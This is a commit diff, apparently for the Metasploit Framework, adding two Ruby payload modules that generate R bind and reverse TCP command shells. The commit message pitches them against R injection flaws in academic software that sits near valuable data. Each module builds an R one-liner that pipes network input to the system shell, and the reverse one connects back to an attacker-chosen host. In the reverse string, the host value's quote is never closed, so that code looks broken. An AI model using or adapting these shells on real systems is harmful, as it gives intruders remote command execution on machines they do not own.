Reverse and bind shells in R
Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitionsbug/bundler_fix
parent
6ecdb8f2cc
commit
d76616e8e8
|
@ -0,0 +1,43 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core/payload/r'
|
||||||
|
require 'msf/core/handler/bind_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
|
module MetasploitModule
|
||||||
|
|
||||||
|
CachedSize = 516
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
include Msf::Payload::R
|
||||||
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'R Command Shell, Bind TCP',
|
||||||
|
'Description' => 'Continually listen for a connection and spawn a command shell via R',
|
||||||
|
'Author' => [ 'RageLtMan' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'r',
|
||||||
|
'Arch' => ARCH_R,
|
||||||
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'PayloadType' => 'r',
|
||||||
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate
|
||||||
|
return prepends(r_string)
|
||||||
|
end
|
||||||
|
|
||||||
|
def r_string
|
||||||
|
return "s<-socketConnection(port=#{datastore['LPORT']}," +
|
||||||
|
"blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
|
||||||
|
"(pipe(readLines(s,1))),s)}"
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,45 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core/payload/r'
|
||||||
|
require 'msf/core/handler/reverse_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
|
module MetasploitModule
|
||||||
|
|
||||||
|
CachedSize = 516
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
include Msf::Payload::R
|
||||||
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'R Command Shell, Reverse TCP',
|
||||||
|
'Description' => 'Connect back and create a command shell via R',
|
||||||
|
'Author' => [ 'RageLtMan' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'r',
|
||||||
|
'Arch' => ARCH_R,
|
||||||
|
'Handler' => Msf::Handler::ReverseTcp,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'PayloadType' => 'r',
|
||||||
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate
|
||||||
|
return prepends(r_string)
|
||||||
|
end
|
||||||
|
|
||||||
|
def r_string
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
||||||
|
return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
|
||||||
|
"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
|
||||||
|
"(pipe(readLines(s, 1))),s)}"
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue